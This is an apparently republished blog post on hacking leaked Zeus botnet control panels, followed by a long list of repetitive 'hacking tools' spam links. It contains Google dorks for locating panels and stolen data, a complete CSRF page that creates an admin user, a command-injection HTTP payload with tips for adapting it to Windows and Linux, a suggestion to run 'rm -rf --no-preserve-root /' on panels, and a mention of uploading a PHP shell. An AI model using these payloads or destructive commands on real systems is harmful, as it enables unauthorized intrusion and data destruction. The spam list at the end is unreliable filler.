Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

More articles

1. Usb Pentest Tools
2. Hack Tools Download
3. Termux Hacking Tools 2019
4. Pentest Tools Windows
5. Hack Tool Apk
6. Pentest Tools Github
7. How To Hack
8. Pentest Tools Open Source
9. How To Make Hacking Tools
10. Pentest Recon Tools
11. Black Hat Hacker Tools
12. Hack Tools Mac
13. Hack And Tools
14. Pentest Tools Framework
15. Hack Rom Tools
16. Hacking Tools For Pc
17. Hack Tools Pc
18. Blackhat Hacker Tools
19. Hack Tools Online
20. Hacking Tools Github
21. Pentest Tools For Windows
22. Hacker Tools Online
23. Hack Tools For Pc
24. Hacking Tools Kit
25. Hack Tools Github
26. Hack Website Online Tool
27. Hacking Tools Free Download
28. Hacker
29. World No 1 Hacker Software
30. Hack Tools Online
31. Hacker Tools For Mac
32. Hacking Tools Hardware
33. Pentest Tools Tcp Port Scanner
34. Pentest Tools Port Scanner
35. Hack Apps
36. Hacking Tools
37. Hacker Tools For Windows
38. Hacker Search Tools
39. New Hacker Tools
40. Game Hacking
41. Hacking Tools Free Download
42. Hacking Tools And Software
43. Hacker Tool Kit
44. Physical Pentest Tools
45. Hacker Tools For Ios
46. Blackhat Hacker Tools
47. Hacker Tools List
48. Hacker Tools Free
49. Game Hacking
50. Underground Hacker Sites
51. Black Hat Hacker Tools
52. Pentest Automation Tools
53. Hack Tools Mac
54. Termux Hacking Tools 2019
55. Hacking Tools For Pc
56. Hacker Tools 2019
57. Hacking Tools Kit
58. Hacker Tools For Mac
59. Hacking Tools For Windows 7
60. Hack Tools For Games
61. Pentest Tools Tcp Port Scanner
62. Pentest Tools Find Subdomains
63. Hacker Tools Online
64. Hacker Tools Mac
65. Termux Hacking Tools 2019
66. Hacker Tools Apk
67. Pentest Tools For Windows
68. Hacking Tools Windows 10
69. Hacking Tools Windows 10
70. Hacker Tools For Pc
71. Hacking Tools For Pc
72. Hacking Tools Download
73. Hacks And Tools
74. Hack Tools Download
75. Hacking Tools Software
76. Underground Hacker Sites
77. Hacker Tools Hardware
78. Pentest Tools Free
79. Pentest Automation Tools
80. Best Pentesting Tools 2018
81. Beginner Hacker Tools
82. Hacking Tools For Mac
83. What Is Hacking Tools
84. Pentest Tools
85. Tools 4 Hack
86. Pentest Tools Review
87. Hak5 Tools
88. Hack And Tools
89. Hacking Tools Name
90. Pentest Tools For Windows
91. Hackrf Tools
92. Pentest Tools Alternative
93. Hacking Tools Windows
94. Hack Tools Github
95. Hack Tool Apk
96. Pentest Automation Tools
97. Pentest Tools Windows
98. Pentest Tools Apk
99. Pentest Reporting Tools
100. Pentest Tools Website
101. Pentest Tools Port Scanner
102. Hacking Tools For Pc
103. Hacking Tools Hardware
104. Pentest Tools For Android
105. Hacker Tools 2020
106. Physical Pentest Tools
107. Top Pentest Tools
108. Hacking Tools Mac
109. Hacking Tools Mac
110. Hacking Tools Mac
111. Hak5 Tools
112. Pentest Tools Alternative
113. Tools Used For Hacking
114. Nsa Hack Tools
115. Best Pentesting Tools 2018
116. Pentest Box Tools Download
117. Kik Hack Tools
118. Hacking Tools Hardware
119. Pentest Tools Download
120. Pentest Automation Tools
121. Github Hacking Tools
122. Hacker Tools Windows
123. Hacker
124. Hack And Tools
125. Hacking Tools Hardware
126. Hack Apps
127. Pentest Tools Nmap
128. Hacker Tools Hardware
129. Hack Rom Tools
130. Hacking Tools Mac
131. Kik Hack Tools
132. Hacking Tools For Kali Linux
133. Nsa Hacker Tools
134. Hacking Tools For Games
135. Kik Hack Tools
136. Pentest Box Tools Download
137. Hacking Tools Kit
138. Pentest Tools Windows